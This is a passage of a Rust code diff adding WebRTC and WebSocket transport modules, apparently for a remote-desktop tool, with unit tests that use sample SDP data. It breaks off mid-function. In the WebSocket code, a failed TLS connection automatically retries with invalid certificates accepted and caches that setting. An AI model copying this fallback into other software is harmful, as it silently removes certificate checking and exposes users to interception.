+const DATA_CHANNEL_BUFFER_SIZE: u16 = u16::MAX;
+
+// use 3 public STUN servers to find out the NAT type, 2 must be the same address but different ports
+// https://stackoverflow.com/questions/72805316/determine-nat-mapping-behaviour-using-two-stun-servers
+// luckily nextcloud supports two ports for STUN
+// unluckily webrtc-rs does not use the same port to do the STUN request
+static DEFAULT_ICE_SERVERS: [&str; 3] = [
+    "stun:stun.cloudflare.com:3478",
+    "stun:stun.nextcloud.com:3478",
+    "stun:stun.nextcloud.com:443",
+];
+
+lazy_static::lazy_static! {
+    static ref SESSIONS: Arc::<Mutex<HashMap<String, WebRTCStream>>> = Default::default();
+}
+
+impl Clone for WebRTCStream {
+    fn clone(&self) -> Self {
+        WebRTCStream {
+            pc: self.pc.clone(),
+            stream: self.stream.clone(),
+            state_notify: self.state_notify.clone(),
+            send_timeout: self.send_timeout,
+        }
+    }
+}
+
+impl WebRTCStream {
+    #[inline]
+    fn get_remote_offer(endpoint: &str) -> ResultType<String> {
+        // Ensure the endpoint starts with the "webrtc://" prefix
+        if !endpoint.starts_with("webrtc://") {
+            return Err(
+                Error::new(ErrorKind::InvalidInput, "Invalid WebRTC endpoint format").into(),
+            );
+        }
+
+        // Extract the Base64-encoded SDP part
+        let encoded_sdp = &endpoint["webrtc://".len()..];
+        // Decode the Base64 string
+        let decoded_bytes = BASE64_STANDARD
+            .decode(encoded_sdp)
+            .map_err(|_| Error::new(ErrorKind::InvalidInput, "Failed to decode Base64 SDP"))?;
+        Ok(String::from_utf8(decoded_bytes).map_err(|_| {
+            Error::new(
+                ErrorKind::InvalidInput,
+                "Failed to convert decoded bytes to UTF-8",
+            )
+        })?)
+    }
+
+    #[inline]
+    fn sdp_to_endpoint(sdp: &str) -> String {
+        let encoded_sdp = BASE64_STANDARD.encode(sdp);
+        format!("webrtc://{}", encoded_sdp)
+    }
+
+    #[inline]
+    fn get_key_for_sdp(sdp: &RTCSessionDescription) -> ResultType<String> {
+        let binding = sdp.unmarshal()?;
+        let Some(fingerprint) = binding.attribute("fingerprint") else {
+            // find fingerprint attribute in media descriptions
+            for media in &binding.media_descriptions {
+                if media.media_name.media != "application" {
+                    continue;
+                }
+                if let Some(fp) = media
+                    .attributes
+                    .iter()
+                    .find(|x| x.key == "fingerprint")
+                    .and_then(|x| x.value.clone())
+                {
+                    return Ok(fp);
+                }
+            }
+            return Err(anyhow::anyhow!("SDP fingerprint attribute not found"));
+        };
+        Ok(fingerprint.to_string())
+    }
+
+    #[inline]
+    fn get_key_for_sdp_json(sdp_json: &str) -> ResultType<String> {
+        if sdp_json.is_empty() {
+            return Ok("".to_string());
+        }
+        let sdp = serde_json::from_str::<RTCSessionDescription>(&sdp_json)?;
+        Self::get_key_for_sdp(&sdp)
+    }
+
+    #[inline]
+    async fn get_key_for_peer(pc: &Arc<RTCPeerConnection>, is_local: bool) -> ResultType<String> {
+        let Some(desc) = (match is_local {
+            true => pc.local_description().await,
+            false => pc.remote_description().await,
+        }) else {
+            return Err(anyhow::anyhow!("PeerConnection description is not set"));
+        };
+        Self::get_key_for_sdp(&desc)
+    }
+
+    #[inline]
+    fn get_ice_server_from_url(url: &str) -> Option<RTCIceServer> {
+        // standard url format with turn scheme: turn://user:pass@host:port
+        match Url::parse(url) {
+            Ok(u) => {
+                if u.scheme() == "turn"
+                    || u.scheme() == "turns"
+                    || u.scheme() == "stun"
+                    || u.scheme() == "stuns"
+                {
+                    Some(RTCIceServer {
+                        urls: vec![format!(
+                            "{}:{}:{}",
+                            u.scheme(),
+                            u.host_str().unwrap_or_default(),
+                            u.port().unwrap_or(3478)
+                        )],
+                        username: u.username().to_string(),
+                        credential: u.password().unwrap_or_default().to_string(),
+                        ..Default::default()
+                    })
+                } else {
+                    None
+                }
+            }
+            Err(_) => None,
+        }
+    }
+
+    #[inline]
+    fn get_ice_servers() -> Vec<RTCIceServer> {
+        let mut ice_servers = Vec::new();
+        let cfg = config::Config::get_option(config::keys::OPTION_ICE_SERVERS);
+
+        let mut has_stun = false;
+
+        for url in cfg.split(',').map(str::trim) {
+            if let Some(ice_server) = Self::get_ice_server_from_url(url) {
+                // Detect STUN in user config
+                if ice_server
+                    .urls
+                    .iter()
+                    .any(|u| u.starts_with("stun:") || u.starts_with("stuns:"))
+                {
+                    has_stun = true;
+                }
+
+                ice_servers.push(ice_server);
+            }
+        }
+
+        // If there is no STUN (either TURN-only or empty config) → prepend defaults
+        if !has_stun {
+            ice_servers.insert(
+                0,
+                RTCIceServer {
+                    urls: DEFAULT_ICE_SERVERS.iter().map(|s| s.to_string()).collect(),
+                    ..Default::default()
+                },
+            );
+        }
+        ice_servers
+    }
+
+    pub async fn new(
+        remote_endpoint: &str,
+        force_relay: bool,
+        ms_timeout: u64,
+    ) -> ResultType<Self> {
+        log::debug!("New webrtc stream to endpoint: {}", remote_endpoint);
+        let remote_offer = if remote_endpoint.is_empty() {
+            "".into()
+        } else {
+            Self::get_remote_offer(remote_endpoint)?
+        };
+
+        let mut key = Self::get_key_for_sdp_json(&remote_offer)?;
+        let sessions_lock = SESSIONS.lock().await;
+        if let Some(cached_stream) = sessions_lock.get(&key) {
+            if !key.is_empty() {
+                log::debug!("Start webrtc with cached peer");
+                return Ok(cached_stream.clone());
+            }
+        }
+        drop(sessions_lock);
+
+        let start_local_offer = remote_offer.is_empty();
+        // Create a SettingEngine and enable Detach
+        let mut s = SettingEngine::default();
+        s.detach_data_channels();
+        s.set_ice_multicast_dns_mode(MulticastDnsMode::Disabled);
+
+        // Create the API object
+        let api = APIBuilder::new().with_setting_engine(s).build();
+
+        // Prepare the configuration, get ICE servers from config
+        let config = RTCConfiguration {
+            ice_servers: Self::get_ice_servers(),
+            ice_transport_policy: if force_relay {
+                RTCIceTransportPolicy::Relay
+            } else {
+                RTCIceTransportPolicy::All
+            },
+            ..Default::default()
+        };
+
+        let (notify_tx, notify_rx) = watch::channel(false);
+        // Create a new RTCPeerConnection
+        let pc = Arc::new(api.new_peer_connection(config).await?);
+        let bootstrap_dc = if start_local_offer {
+            let dc_open_notify = notify_tx.clone();
+            // Create a data channel with label "bootstrap"
+            let dc = pc.create_data_channel("bootstrap", None).await?;
+            dc.on_open(Box::new(move || {
+                log::debug!("Local data channel bootstrap open.");
+                let _ = dc_open_notify.send(true);
+                Box::pin(async {})
+            }));
+            dc
+        } else {
+            // Wait for the data channel to be created by the remote peer
+            // Here we create a dummy data channel to satisfy the type system
+            Arc::new(RTCDataChannel::default())
+        };
+
+        let stream = Arc::new(Mutex::new(bootstrap_dc));
+        if !start_local_offer {
+            // Register data channel creation handling
+            let dc_open_notify = notify_tx.clone();
+            let stream_for_dc = stream.clone();
+            pc.on_data_channel(Box::new(move |dc: Arc<RTCDataChannel>| {
+                let d_label = dc.label().to_owned();
+                let dc_open_notify2 = dc_open_notify.clone();
+                let stream_for_dc_clone = stream_for_dc.clone();
+                log::debug!("Remote data channel {} ready", d_label);
+                Box::pin(async move {
+                    let mut stream_lock = stream_for_dc_clone.lock().await;
+                    *stream_lock = dc.clone();
+                    drop(stream_lock);
+                    dc.on_open(Box::new(move || {
+                        let _ = dc_open_notify2.send(true);
+                        Box::pin(async {})
+                    }));
+                })
+            }));
+        }
+
+        // This will notify you when the peer has connected/disconnected
+        let stream_for_close = stream.clone();
+        let pc_for_close = pc.clone();
+        pc.on_peer_connection_state_change(Box::new(move |s: RTCPeerConnectionState| {
+            let stream_for_close2 = stream_for_close.clone();
+            let on_connection_notify = notify_tx.clone();
+            let pc_for_close2 = pc_for_close.clone();
+            Box::pin(async move {
+                log::debug!("WebRTC session peer connection state: {}", s);
+                match s {
+                    RTCPeerConnectionState::Disconnected
+                    | RTCPeerConnectionState::Failed
+                    | RTCPeerConnectionState::Closed => {
+                        let _ = on_connection_notify.send(true);
+                        log::debug!("WebRTC session closing due to disconnected");
+                        let _ = stream_for_close2.lock().await.close().await;
+                        log::debug!("WebRTC session stream closed");
+
+                        let mut sessions_lock = SESSIONS.lock().await;
+                        match Self::get_key_for_peer(&pc_for_close2, start_local_offer).await {
+                            Ok(k) => {
+                                sessions_lock.remove(&k);
+                                log::debug!("WebRTC session removed key: {}", k);
+                            }
+                            Err(e) => {
+                                log::error!(
+                                    "Failed to extract key for peer during session cleanup: {:?}",
+                                    e
+                                );
+                                // Fallback: try to remove any session associated with this peer connection
+                                let keys_to_remove: Vec<String> = sessions_lock
+                                    .iter()
+                                    .filter_map(|(key, session)| {
+                                        if Arc::ptr_eq(&session.pc, &pc_for_close2) {
+                                            Some(key.clone())
+                                        } else {
+                                            None
+                                        }
+                                    })
+                                    .collect();
+                                for k in keys_to_remove {
+                                    sessions_lock.remove(&k);
+                                    log::debug!("WebRTC session removed by fallback key: {}", k);
+                                }
+                            }
+                        }
+                    }
+                    _ => {}
+                }
+            })
+        }));
+
+        // process offer/answer
+        if start_local_offer {
+            let sdp = pc.create_offer(None).await?;
+            let mut gather_complete = pc.gathering_complete_promise().await;
+            pc.set_local_description(sdp.clone()).await?;
+            let _ = gather_complete.recv().await;
+
+            log::debug!("local offer:\n{}", sdp.sdp);
+            // get local sdp key
+            key = Self::get_key_for_sdp(&sdp)?;
+            log::debug!("Start webrtc with local key: {}", key);
+        } else {
+            let sdp = serde_json::from_str::<RTCSessionDescription>(&remote_offer)?;
+            pc.set_remote_description(sdp.clone()).await?;
+            let answer = pc.create_answer(None).await?;
+            let mut gather_complete = pc.gathering_complete_promise().await;
+            pc.set_local_description(answer).await?;
+            let _ = gather_complete.recv().await;
+
+            log::debug!("remote offer:\n{}", sdp.sdp);
+            // get remote sdp key
+            key = Self::get_key_for_sdp(&sdp)?;
+            log::debug!("Start webrtc with remote key: {}", key);
+        }
+
+        let mut final_lock = SESSIONS.lock().await;
+        if let Some(session) = final_lock.get(&key) {
+            pc.close().await.ok();
+            return Ok(session.clone());
+        }
+
+        let webrtc_stream = Self {
+            pc,
+            stream,
+            state_notify: notify_rx,
+            send_timeout: ms_timeout,
+        };
+        final_lock.insert(key, webrtc_stream.clone());
+        Ok(webrtc_stream)
+    }
+
+    #[inline]
+    pub async fn get_local_endpoint(&self) -> ResultType<String> {
+        if let Some(local_desc) = self.pc.local_description().await {
+            let sdp = serde_json::to_string(&local_desc)?;
+            let endpoint = Self::sdp_to_endpoint(&sdp);
+            Ok(endpoint)
+        } else {
+            Err(anyhow::anyhow!("Local desc is not set"))
+        }
+    }
+
+    #[inline]
+    pub async fn set_remote_endpoint(&self, endpoint: &str) -> ResultType<()> {
+        let offer = Self::get_remote_offer(endpoint)?;
+        log::debug!("WebRTC set remote sdp: {}", offer);
+        let sdp = serde_json::from_str::<RTCSessionDescription>(&offer)?;
+        self.pc.set_remote_description(sdp).await?;
+        Ok(())
+    }
+
+    #[inline]
+    pub fn set_raw(&mut self) {
+        // not-supported
+    }
+
+    #[inline]
+    pub fn local_addr(&self) -> SocketAddr {
+        SocketAddr::new(IpAddr::V4(Ipv4Addr::UNSPECIFIED), 0)
+    }
+
+    #[inline]
+    pub fn set_send_timeout(&mut self, ms: u64) {
+        self.send_timeout = ms;
+    }
+
+    #[inline]
+    pub fn set_key(&mut self, _key: Key) {
+        // not-supported
+        // WebRTC uses built-in DTLS encryption for secure communication.
+        // DTLS handles key exchange and encryption automatically, so explicit key management is not required.
+    }
+
+    #[inline]
+    pub fn is_secured(&self) -> bool {
+        true
+    }
+
+    #[inline]
+    pub async fn send(&mut self, msg: &impl Message) -> ResultType<()> {
+        self.send_raw(msg.write_to_bytes()?).await
+    }
+
+    #[inline]
+    pub async fn send_raw(&mut self, msg: Vec<u8>) -> ResultType<()> {
+        self.send_bytes(Bytes::from(msg)).await
+    }
+
+    #[inline]
+    async fn wait_for_connect_result(&mut self) {
+        if *self.state_notify.borrow() {
+            return;
+        }
+        let _ = self.state_notify.changed().await;
+    }
+
+    pub async fn send_bytes(&mut self, bytes: Bytes) -> ResultType<()> {
+        if self.send_timeout > 0 {
+            match timeout(
+                Duration::from_millis(self.send_timeout),
+                self.wait_for_connect_result(),
+            )
+            .await
+            {
+                Ok(_) => {}
+                Err(_) => {
+                    self.pc.close().await.ok();
+                    return Err(Error::new(
+                        ErrorKind::TimedOut,
+                        "WebRTC send wait for connect timeout",
+                    )
+                    .into());
+                }
+            }
+        } else {
+            self.wait_for_connect_result().await;
+        }
+        let stream = self.stream.lock().await.clone();
+        stream.send(&bytes).await?;
+        Ok(())
+    }
+
+    #[inline]
+    pub async fn next(&mut self) -> Option<Result<BytesMut, Error>> {
+        self.wait_for_connect_result().await;
+        let stream = self.stream.lock().await.clone();
+
+        // TODO reuse buffer?
+        let mut buffer = BytesMut::zeroed(DATA_CHANNEL_BUFFER_SIZE as usize);
+        let dc = stream.detach().await.ok()?;
+        let n = match dc.read(&mut buffer).await {
+            Ok(n) => n,
+            Err(err) => {
+                self.pc.close().await.ok();
+                return Some(Err(Error::new(
+                    ErrorKind::Other,
+                    format!("data channel read error: {}", err),
+                )));
+            }
+        };
+        if n == 0 {
+            self.pc.close().await.ok();
+            return Some(Err(Error::new(
+                ErrorKind::Other,
+                "data channel read exited with 0 bytes",
+            )));
+        }
+        buffer.truncate(n);
+        Some(Ok(buffer))
+    }
+
+    #[inline]
+    pub async fn next_timeout(&mut self, ms: u64) -> Option<Result<BytesMut, Error>> {
+        match timeout(Duration::from_millis(ms), self.next()).await {
+            Ok(res) => res,
+            Err(_) => None,
+        }
+    }
+}
+
+pub fn is_webrtc_endpoint(endpoint: &str) -> bool {
+    // use sdp base64 json string as endpoint, or prefix webrtc:
+    endpoint.starts_with("webrtc://")
+}
+
+#[cfg(test)]
+mod tests {
+    use crate::config;
+    use crate::webrtc::WebRTCStream;
+    use crate::webrtc::DEFAULT_ICE_SERVERS;
+    use webrtc::peer_connection::sdp::session_description::RTCSessionDescription;
+
+    #[test]
+    fn test_webrtc_ice_url() {
+        assert_eq!(
+            WebRTCStream::get_ice_server_from_url("turn://example.com:3478")
+                .unwrap_or_default()
+                .urls[0],
+            "turn:example.com:3478"
+        );
+
+        assert_eq!(
+            WebRTCStream::get_ice_server_from_url("turn://example.com")
+                .unwrap_or_default()
+                .urls[0],
+            "turn:example.com:3478"
+        );
+
+        assert_eq!(
+            WebRTCStream::get_ice_server_from_url("turn://123@example.com")
+                .unwrap_or_default()
+                .username,
+            "123"
+        );
+
+        assert_eq!(
+            WebRTCStream::get_ice_server_from_url("turn://123@example.com")
+                .unwrap_or_default()
+                .credential,
+            ""
+        );
+
+        assert_eq!(
+            WebRTCStream::get_ice_server_from_url("turn://123:321@example.com")
+                .unwrap_or_default()
+                .credential,
+            "321"
+        );
+
+        assert_eq!(
+            WebRTCStream::get_ice_server_from_url("stun://example.com:3478")
+                .unwrap_or_default()
+                .urls[0],
+            "stun:example.com:3478"
+        );
+
+        assert_eq!(
+            WebRTCStream::get_ice_server_from_url("http://123:123@example.com:3478"),
+            None
+        );
+
+        config::Config::set_option("ice-servers".to_string(), "".to_string());
+        assert_eq!(
+            WebRTCStream::get_ice_servers()[0].urls[0],
+            DEFAULT_ICE_SERVERS[0].to_string()
+        );
+
+        config::Config::set_option(
+            "ice-servers".to_string(),
+            ",stun://example.com,turn://example.com,sdf".to_string(),
+        );
+        assert_eq!(
+            WebRTCStream::get_ice_servers()[0].urls[0],
+            "stun:example.com:3478"
+        );
+        assert_eq!(
+            WebRTCStream::get_ice_servers()[1].urls[0],
+            "turn:example.com:3478"
+        );
+        assert_eq!(WebRTCStream::get_ice_servers().len(), 2);
+        config::Config::set_option(
+            "ice-servers".to_string(),
+            "".to_string(),
+        );
+    }
+
+    #[test]
+    fn test_webrtc_session_key() {
+        let mut sdp_str = "".to_owned();
+        assert_eq!(
+            WebRTCStream::get_key_for_sdp(
+                &RTCSessionDescription::offer(sdp_str).unwrap_or_default()
+            )
+            .unwrap_or_default(),
+            ""
+        );
+
+        sdp_str = "\
+v=0
+o=- 7400546379179479477 208696200 IN IP4 0.0.0.0
+s=-
+t=0 0
+a=fingerprint:sha-256 97:52:D6:1F:1E:87:6C:DA:B8:21:95:64:A5:85:89:FA:02:71:C7:4D:B3:FD:25:92:40:FB:6B:65:24:3C:79:88
+a=group:BUNDLE 0
+a=extmap-allow-mixed
+m=application 9 UDP/DTLS/SCTP webrtc-datachannel
+c=IN IP4 0.0.0.0
+a=setup:actpass
+a=mid:0
+a=sendrecv
+a=sctp-port:5000
+a=ice-ufrag:RMWjjpXfpXbDPdMz
+a=ice-pwd:BtIqlWHfwhsJdFiBROeLuEbNmYfHxRfT".to_owned();
+        assert_eq!(
+            WebRTCStream::get_key_for_sdp(
+                &RTCSessionDescription::offer(sdp_str).unwrap_or_default()
+            ).unwrap_or_default(),
+            "sha-256 97:52:D6:1F:1E:87:6C:DA:B8:21:95:64:A5:85:89:FA:02:71:C7:4D:B3:FD:25:92:40:FB:6B:65:24:3C:79:88"
+        );
+
+        sdp_str = "\
+v=0
+o=- 7400546379179479477 208696200 IN IP4 0.0.0.0
+s=-
+t=0 0
+a=group:BUNDLE 0
+a=extmap-allow-mixed
+m=application 9 UDP/DTLS/SCTP webrtc-datachannel
+c=IN IP4 0.0.0.0
+a=fingerprint:sha-256 97:52:D6:1F:1E:87:6C:DA:B8:21:95:64:A5:85:89:FA:02:71:C7:4D:B3:FD:25:92:40:FB:6B:65:24:3C:79:88
+a=setup:actpass
+a=mid:0
+a=sendrecv
+a=sctp-port:5000
+a=ice-ufrag:RMWjjpXfpXbDPdMz
+a=ice-pwd:BtIqlWHfwhsJdFiBROeLuEbNmYfHxRfT".to_owned();
+        assert_eq!(
+            WebRTCStream::get_key_for_sdp(
+                &RTCSessionDescription::offer(sdp_str).unwrap_or_default()
+            ).unwrap_or_default(),
+            "sha-256 97:52:D6:1F:1E:87:6C:DA:B8:21:95:64:A5:85:89:FA:02:71:C7:4D:B3:FD:25:92:40:FB:6B:65:24:3C:79:88"
+        );
+
+        sdp_str = "\
+v=0
+o=- 7400546379179479477 208696200 IN IP4 0.0.0.0
+s=-
+t=0 0
+a=group:BUNDLE 0
+a=extmap-allow-mixed
+m=application 9 UDP/DTLS/SCTP webrtc-datachannel
+c=IN IP4 0.0.0.0
+a=setup:actpass
+a=mid:0
+a=sendrecv
+a=sctp-port:5000
+a=ice-ufrag:RMWjjpXfpXbDPdMz
+a=ice-pwd:BtIqlWHfwhsJdFiBROeLuEbNmYfHxRfT"
+            .to_owned();
+        assert!(
+            WebRTCStream::get_key_for_sdp(
+                &RTCSessionDescription::offer(sdp_str).unwrap_or_default()
+            )
+            .is_err(),
+            "can not find fingerprint attribute"
+        );
+
+        sdp_str = "\
+v=0
+o=- 7400546379179479477 208696200 IN IP4 0.0.0.0
+s=-
+t=0 0
+a=group:BUNDLE 0
+a=extmap-allow-mixed
+m=audio 9 UDP/DTLS/SCTP webrtc-datachannel
+c=IN IP4 0.0.0.0
+a=fingerprint:sha-256 97:52:D6:1F:1E:87:6C:DA:B8:21:95:64:A5:85:89:FA:02:71:C7:4D:B3:FD:25:92:40:FB:6B:65:24:3C:79:88
+a=setup:actpass
+a=mid:0
+a=sendrecv
+a=sctp-port:5000
+a=ice-ufrag:RMWjjpXfpXbDPdMz
+a=ice-pwd:BtIqlWHfwhsJdFiBROeLuEbNmYfHxRfT".to_owned();
+        assert!(
+            WebRTCStream::get_key_for_sdp(
+                &RTCSessionDescription::offer(sdp_str).unwrap_or_default()
+            )
+            .is_err(),
+            "can not find datachannel fingerprint attribute"
+        );
+
+        assert!(
+            WebRTCStream::get_key_for_sdp(
+                &RTCSessionDescription::offer("".to_owned()).unwrap_or_default()
+            )
+            .is_err(),
+            "invalid sdp should error"
+        );
+
+        assert!(
+            WebRTCStream::get_key_for_sdp_json("{}").is_err(),
+            "empty sdp json should error"
+        );
+
+        assert!(
+            WebRTCStream::get_key_for_sdp_json("{ss}").is_err(),
+            "invalid sdp json should error"
+        );
+
+        let endpoint = "webrtc://eyJ0eXBlIjoiYW5zd2VyIiwic2RwIjoidj0wXHJcbm89LSA0MTA1NDk3NTY2NDgyMTQzODEwIDYwMzk1NzQw\
+MCBJTiBJUDQgMC4wLjAuMFxyXG5zPS1cclxudD0wIDBcclxuYT1maW5nZXJwcmludDpzaGEtMjU2IDYxOjYwOjc0OjQwOjI4OkNFOjBCOjBDOjc1OjRCOj\
+EwOjlBOkVFOjc3OkY1OjQ0OjU3Ojg0OjUxOkRCOjA0OjkyOjRBOjEwOjFDOjRFOjVGOjdFOkYxOkIzOjcxOjIyXHJcbmE9Z3JvdXA6QlVORExFIDBcclxu\
+YT1leHRtYXAtYWxsb3ctbWl4ZWRcclxubT1hcHBsaWNhdGlvbiA5IFVEUC9EVExTL1NDVFAgd2VicnRjLWRhdGFjaGFubmVsXHJcbmM9SU4gSVA0IDAuMC\
+4wLjBcclxuYT1zZXR1cDphY3RpdmVcclxuYT1taWQ6MFxyXG5hPXNlbmRyZWN2XHJcbmE9c2N0cC1wb3J0OjUwMDBcclxuYT1pY2UtdWZyYWc6SHlnU1Rr\
+V2RsRlpHRG1XWlxyXG5hPWljZS1wd2Q6SkJneFZWaGZveVhHdHZha1VWcnBQeHVOSVpMU3llS1pcclxuYT1jYW5kaWRhdGU6OTYzOTg4MzQ4IDEgdWRwID\
+IxMzA3MDY0MzEgMTkyLjE2OC4xLjIgNjQwMDcgdHlwIGhvc3RcclxuYT1jYW5kaWRhdGU6OTYzOTg4MzQ4IDIgdWRwIDIxMzA3MDY0MzEgMTkyLjE2OC4x\
+LjIgNjQwMDcgdHlwIGhvc3RcclxuYT1jYW5kaWRhdGU6MTg2MTA0NTE5MCAxIHVkcCAxNjk0NDk4ODE1IDE0LjIxMi42OC4xMiAyNzAwNCB0eXAgc3JmbH\
+ggcmFkZHIgMC4wLjAuMCBycG9ydCA2NDAwOFxyXG5hPWNhbmRpZGF0ZToxODYxMDQ1MTkwIDIgdWRwIDE2OTQ0OTg4MTUgMTQuMjEyLjY4LjEyIDI3MDA0\
+IHR5cCBzcmZseCByYWRkciAwLjAuMC4wIHJwb3J0IDY0MDA4XHJcbmE9ZW5kLW9mLWNhbmRpZGF0ZXNcclxuIn0=".to_owned();
+        assert_eq!(
+            WebRTCStream::get_key_for_sdp_json(
+                &WebRTCStream::get_remote_offer(&endpoint).unwrap_or_default()
+            ).unwrap_or_default(),
+            "sha-256 61:60:74:40:28:CE:0B:0C:75:4B:10:9A:EE:77:F5:44:57:84:51:DB:04:92:4A:10:1C:4E:5F:7E:F1:B3:71:22"
+        );
+    }
+
+    #[tokio::test]
+    async fn test_webrtc_new_stream() {
+        let mut endpoint = "webrtc://sdfsdf".to_owned();
+        assert!(
+            WebRTCStream::new(&endpoint, false, 10000).await.is_err(),
+            "invalid webrtc endpoint should error"
+        );
+
+        endpoint = "wss://sdfsdf".to_owned();
+        assert!(
+            WebRTCStream::new(&endpoint, false, 10000).await.is_err(),
+            "invalid webrtc endpoint should error"
+        );
+
+        assert!(
+            WebRTCStream::new("", false, 10000).await.is_ok(),
+            "local webrtc endpoint should ok"
+        );
+
+        endpoint = "webrtc://eyJ0eXBlIjoiYW5zd2VyIiwic2RwIjoidj0wXHJcbm89LSA0MTA1NDk3NTY2NDgyMTQzODEwIDYwMzk1NzQw\
+MCBJTiBJUDQgMC4wLjAuMFxyXG5zPS1cclxudD0wIDBcclxuYT1maW5nZXJwcmludDpzaGEtMjU2IDYxOjYwOjc0OjQwOjI4OkNFOjBCOjBDOjc1OjRCOj\
+EwOjlBOkVFOjc3OkY1OjQ0OjU3Ojg0OjUxOkRCOjA0OjkyOjRBOjEwOjFDOjRFOjVGOjdFOkYxOkIzOjcxOjIyXHJcbmE9Z3JvdXA6QlVORExFIDBcclxu\
+YT1leHRtYXAtYWxsb3ctbWl4ZWRcclxubT1hcHBsaWNhdGlvbiA5IFVEUC9EVExTL1NDVFAgd2VicnRjLWRhdGFjaGFubmVsXHJcbmM9SU4gSVA0IDAuMC\
+4wLjBcclxuYT1zZXR1cDphY3RpdmVcclxuYT1taWQ6MFxyXG5hPXNlbmRyZWN2XHJcbmE9c2N0cC1wb3J0OjUwMDBcclxuYT1pY2UtdWZyYWc6SHlnU1Rr\
+V2RsRlpHRG1XWlxyXG5hPWljZS1wd2Q6SkJneFZWaGZveVhHdHZha1VWcnBQeHVOSVpMU3llS1pcclxuYT1jYW5kaWRhdGU6OTYzOTg4MzQ4IDEgdWRwID\
+IxMzA3MDY0MzEgMTkyLjE2OC4xLjIgNjQwMDcgdHlwIGhvc3RcclxuYT1jYW5kaWRhdGU6OTYzOTg4MzQ4IDIgdWRwIDIxMzA3MDY0MzEgMTkyLjE2OC4x\
+LjIgNjQwMDcgdHlwIGhvc3RcclxuYT1jYW5kaWRhdGU6MTg2MTA0NTE5MCAxIHVkcCAxNjk0NDk4ODE1IDE0LjIxMi42OC4xMiAyNzAwNCB0eXAgc3JmbH\
+ggcmFkZHIgMC4wLjAuMCBycG9ydCA2NDAwOFxyXG5hPWNhbmRpZGF0ZToxODYxMDQ1MTkwIDIgdWRwIDE2OTQ0OTg4MTUgMTQuMjEyLjY4LjEyIDI3MDA0\
+IHR5cCBzcmZseCByYWRkciAwLjAuMC4wIHJwb3J0IDY0MDA4XHJcbmE9ZW5kLW9mLWNhbmRpZGF0ZXNcclxuIn0=".to_owned();
+        assert!(
+            WebRTCStream::new(&endpoint, false, 10000).await.is_err(),
+            "connect to an 'answer' webrtc endpoint should error"
+        );
+    }
+}

--- a/libs/hbb_common/src/websocket.rs
+++ b/libs/hbb_common/src/websocket.rs
@@ -1,0 +1,531 @@
+use crate::{
+    config::{
+        keys::OPTION_RELAY_SERVER, use_ws, Config, Socks5Server, RELAY_PORT, RENDEZVOUS_PORT,
+    },
+    protobuf::Message,
+    socket_client::split_host_port,
+    sodiumoxide::crypto::secretbox::Key,
+    tcp::Encrypt,
+    tls::{get_cached_tls_accept_invalid_cert, get_cached_tls_type, upsert_tls_cache, TlsType},
+    ResultType,
+};
+use anyhow::bail;
+use async_recursion::async_recursion;
+use bytes::{Bytes, BytesMut};
+use futures::{SinkExt, StreamExt};
+use std::{
+    io::{Error, ErrorKind},
+    net::SocketAddr,
+    sync::Arc,
+    time::Duration,
+};
+use tokio::{net::TcpStream, time::timeout};
+use tokio_native_tls::native_tls::TlsConnector;
+use tokio_tungstenite::{
+    connect_async_tls_with_config, tungstenite::protocol::Message as WsMessage, Connector,
+    MaybeTlsStream, WebSocketStream,
+};
+use tungstenite::client::IntoClientRequest;
+use tungstenite::protocol::Role;
+
+pub struct WsFramedStream {
+    stream: WebSocketStream<MaybeTlsStream<TcpStream>>,
+    addr: SocketAddr,
+    encrypt: Option<Encrypt>,
+    send_timeout: u64,
+}
+
+impl WsFramedStream {
+    #[inline]
+    fn get_connector(
+        tls_type: &TlsType,
+        danger_accept_invalid_certs: bool,
+    ) -> ResultType<Option<Connector>> {
+        match tls_type {
+            TlsType::Plain => Ok(Some(Connector::Plain)),
+            TlsType::NativeTls => {
+                let connector = TlsConnector::builder()
+                    .danger_accept_invalid_certs(danger_accept_invalid_certs)
+                    .build()?;
+                Ok(Some(Connector::NativeTls(connector)))
+            }
+            TlsType::Rustls => {
+                let connector = match crate::verifier::client_config(danger_accept_invalid_certs) {
+                    Ok(client_config) => Some(Connector::Rustls(Arc::new(client_config))),
+                    Err(e) => {
+                        log::warn!(
+                            "Failed to get client config: {:?}, fallback to default connector",
+                            e
+                        );
+                        None
+                    }
+                };
+                Ok(connector)
+            }
+        }
+    }
+
+    async fn connect(
+        url: &str,
+        ms_timeout: u64,
+    ) -> ResultType<WebSocketStream<MaybeTlsStream<TcpStream>>> {
+        // to-do: websocket proxy.
+
+        let tls_type = get_cached_tls_type(url);
+        let is_tls_type_cached = tls_type.is_some();
+        let tls_type = tls_type.unwrap_or(TlsType::Rustls);
+        let danger_accept_invalid_cert = get_cached_tls_accept_invalid_cert(&url);
+        Self::try_connect(
+            url,
+            ms_timeout,
+            tls_type,
+            is_tls_type_cached,
+            danger_accept_invalid_cert,
+            danger_accept_invalid_cert,
+        )
+        .await
+    }
+
+    #[async_recursion]
+    async fn try_connect(
+        url: &str,
+        ms_timeout: u64,
+        tls_type: TlsType,
+        is_tls_type_cached: bool,
+        danger_accept_invalid_cert: Option<bool>,
+        original_danger_accept_invalid_certs: Option<bool>,
+    ) -> ResultType<WebSocketStream<MaybeTlsStream<TcpStream>>> {
+        let ws_config = None;
+        let disable_nagle = false;
+        let request = url
+            .into_client_request()
+            .map_err(|e| Error::new(ErrorKind::Other, e))?;
+        let connector =
+            Self::get_connector(&tls_type, danger_accept_invalid_cert.unwrap_or(false))?;
+        match timeout(
+            Duration::from_millis(ms_timeout),
+            connect_async_tls_with_config(request, ws_config, disable_nagle, connector),
+        )
+        .await?
+        {
+            Ok((ws_stream, _)) => {
+                upsert_tls_cache(url, tls_type, danger_accept_invalid_cert.unwrap_or(false));
+                Ok(ws_stream)
+            }
+            Err(e) => match (tls_type, is_tls_type_cached, danger_accept_invalid_cert) {
+                (TlsType::Rustls, _, None) => {
+                    log::warn!(
+                            "WebSocket connection with rustls-tls failed, try accept invalid certs: {}, {:?}",
+                            url,
+                            e
+                        );
+                    Self::try_connect(
+                        url,
+                        ms_timeout,
+                        tls_type,
+                        is_tls_type_cached,
+                        Some(true),
+                        original_danger_accept_invalid_certs,
+                    )
+                    .await
+                }
+                (TlsType::Rustls, false, Some(_)) => {
+                    log::warn!(
+                        "WebSocket connection with rustls-tls failed, try native-tls: {}, {:?}",
+                        url,
+                        e
+                    );
+                    Self::try_connect(
+                        url,
+                        ms_timeout,
+                        TlsType::NativeTls,
+                        is_tls_type_cached,
+                        original_danger_accept_invalid_certs,
+                        original_danger_accept_invalid_certs,
+                    )
+                    .await
+                }
+                (TlsType::NativeTls, _, None) => {
